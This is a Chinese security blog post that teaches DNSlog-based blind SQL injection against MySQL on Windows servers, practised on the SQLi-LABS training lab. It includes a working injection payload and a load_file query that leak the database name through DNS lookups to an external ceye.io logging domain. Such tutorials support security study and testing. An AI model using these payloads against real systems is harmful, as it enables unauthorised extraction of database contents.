<!doctype html>
<html lang="en">
    <head><meta name="generator" content="Hexo 3.9.0">
		
        <meta http-equiv="Content-Type" content="text/html" charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <meta name="description" content>
        <meta name="keywords" content>
        <meta name="HandheldFriendly" content="True">
        <meta name="MobileOptimized" content="320">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="shortcut icon" href="/img/avatar.jpg">
        <link rel="alternate" type="application/rss+xml" title="Wiley" href="/atom.xml">
        <title>Dnslog盲注 | Wiley&#39;s Blog</title>
        <meta name="description" content="{{meta_description}}">
        <link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">
        <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css">
        <link rel="stylesheet" type="text/css" href="/styles/crisp.css">
        <!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries -->
        <!--[if lt IE 9]>
        <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
        <![endif]-->
        <script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.min.js"></script>
        <script src="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>
    </head>
    
		<body class="post-template">
	

        <header id="header">
            <a id="logo" href="/"><img src="/img/avatar.jpg" alt="Wiley's Blog"></a>
            <h1 class="center"><a href="/">Wiley</a></h1>
            <p class="center">信息安全爱好者，未来的CTFer，喜欢写小工具。</p>
            <span id="follow-icons">
      <a href="http://github.com/Wileysec"><i class="fa fa-github-square fa-2x"></i></a>
        <a href="mailto:wileysec@qq.com"><i class="fa fa-envelope-square fa-2x"></i></a>
            <a href="/atom.xml"><i class="fa fa-rss-square fa-2x"></i></a>
  </span>

<h6 class="links">
  <a href="/About">About</a>
  <a href="/Links">Links</a>
  <a href="https://ctf.dog/qqlovelab/" target="_blank">Team</a>
</h6>
        </header>

        <main id="content">
        

<article class="post">
  August 23, 2019
  

  <h1 class="post-title">Dnslog盲注</h1>
  <section class="post-content article-entry">
    <p>在SQL注入盲注中，盲注是很慢的一个过程。但是，对方服务器如果是Windows服务器，MySQL全局变量 <code>secure_file_priv=&#39;&#39;</code> 的时候，我们就可以利用Dnslog盲注出数据，不需要盲注去遍历字母判断是否正确。</p>
<h3 id="什么是Dnslog"><a href="#什么是Dnslog" class="headerlink" title="什么是Dnslog?"></a>什么是Dnslog?</h3><p>给大家看一张图了解一下。</p>
<p><img src="/uploads/2019/08/23/1.png" alt></p>
<p>相信大家看了一头雾水，哈哈哈，别急，我来解释一下。</p>
<p>什么是Dns? 相信大家都知道，但是Dnslog是啥?</p>
<p><code>Dnslog</code> 是一个具有保存Dns日志的一个功能，可以保存 <code>HTTP Request</code> 和 <code>DNS Query</code> 信息。</p>
<p>举个例子，当我有一个Dnslog服务器 <code>abc.ceye.io</code></p>
<p>本次例子用的是CEYE的Dnslog平台，给的是二级域名。</p>
<p>当你访问 <code>xxx.abc.ceye.io</code> 的时候，平台就会记录下来，当然你访问 <code>abc.ceye.io</code> 也会记录下来。</p>
<h3 id="如何使用"><a href="#如何使用" class="headerlink" title="如何使用?"></a>如何使用?</h3><p>使用 <code>curl abc.ceye.io</code> 命令来请求，如果返回信息为 <code>{&quot;meta&quot;: {&quot;code&quot;: 201, &quot;message&quot;: &quot;HTTP Record Insert Success&quot;}}</code> 说明响应成功并写入到了Dnslog</p>
<p><img src="/uploads/2019/08/23/2.png" alt></p>
<p>这个有时候会响应失败，多响应一次就行了。</p>
<h3 id="注意事项"><a href="#注意事项" class="headerlink" title="注意事项"></a>注意事项</h3><p>Dnslog盲注是有条件限制的，对方服务器必须是Windows服务器</p>
<p>MySQL的 <code>secure</code> 全局变量必须是下面设置的</p>
<p>+——————+——-+<br>| Variable_name    | Value |<br>+——————+——-+<br>| secure_auth      | OFF   |<br>| secure_file_priv |       |<br>+——————+——-+</p>
<p><code>secure_file_priv</code> 变量必须为空</p>
<ul>
<li><p>当secure_file_priv为空，就可以读取磁盘的目录。</p>
</li>
<li><p>当secure_file_priv为G:\，就可以读取G盘的文件。</p>
</li>
<li><p>当secure_file_priv为null，load_file就不能加载文件。</p>
</li>
</ul>
<h3 id="Dnslog盲注"><a href="#Dnslog盲注" class="headerlink" title="Dnslog盲注"></a>Dnslog盲注</h3><p>判断是否可以Dnslog盲注，在测试的时候可以使用MySQL客户端执行 <code>select load_file(concat(&#39;\\\\&#39;,(select database()),&#39;.evqrpz.ceye.io\\abc&#39;));</code> 命令，该命令会请求远程的Dns服务器，就会被记录到Dnslog里，从而我们可以获取到数据库名。</p>
<p><img src="/uploads/2019/08/23/3.png" alt></p>
<p>可以看到，响应时间为10秒，这个请求过程花费了10秒，说明已经请求了。</p>
<p><img src="/uploads/2019/08/23/4.png" alt></p>
<p>这里，我选用的是SQLi-LABS里面的第八关布尔盲注来进行测试</p>
<p>Payload: <code>&#39; and if((select load_file(concat(&#39;\\\\&#39;,(select database()),&#39;.abc.ceye.io\\abc&#39;))),1,0)-- s</code></p>
<p><img src="/uploads/2019/08/23/5.png" alt></p>
<p>三级域名的名字就是我们刚刚请求的 <code>select database()</code> 执行后的结果</p>
<p>这里成功的收到了当前数据库名，当然，可以对Payload进行修改查看到其他盲注无法回显的信息，Dnslog都能获取到。</p>

  </section>
  <footer class="post-footer">
    <!--
    <section class="author">
      <h4>Wiley</h4>
      <p></p>
    </section>
    -->
  </footer>
</article>

<nav class="pagination" role="pagination">
    
    <a class="older-posts float-left" href="/posts/efbcfe67.html">
        &laquo; Python信息收集之图片定位
    </a>
    
    
    <a class="newer-posts float-right" href="/posts/c7fd947b.html">
        MySQL删除重复数据并重置ID自增 &raquo;
    </a>
    
    <div class="clear-both"></div>
</nav>

<!-- Table of Contents -->
<div class="full-toc">
    <button class="post-toc-menu">TOC</button>
    <div class="post-toc">
      <span class="post-toc-title">文章目录</span>
        <div class="post-toc-content">
          <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#什么是Dnslog"><span class="toc-text">什么是Dnslog?</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#如何使用"><span class="toc-text">如何使用?</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#注意事项"><span class="toc-text">注意事项</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Dnslog盲注"><span class="toc-text">Dnslog盲注</span></a></li></ol>
        </div>
    </div>
</div>

<script>
  imglength = $('.post-content p').find('img').length;
  for(i=0;i<imglength;i++){
       obj = $(".post-content p img")[i];
       aobj = $(obj).wrap("<a data-fancybox='gallery' no-pjax='' data-type='image' href='' id='fancybox" + i + "'></a>");
       imghref = $(aobj).attr('src');
       $('#fancybox' + i).attr('href',imghref);
    }
  $('.post-toc-menu').click(function(){
    if($('.post-toc').hasClass('open')){
      $('.post-toc').removeClass('open');
    }else{
      $('.post-toc').addClass('open');
    }
  });
</script>


        </main>
        <footer id="footer">
            <section id="footer-message">&copy; 2020 <a href="https://wileysec.github.io">Wiley</a> Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>. <a href="http://www.beian.miit.gov.cn" target="_blank">皖ICP备18006273号-1</a></section>
        </footer>
    </body>
</html>


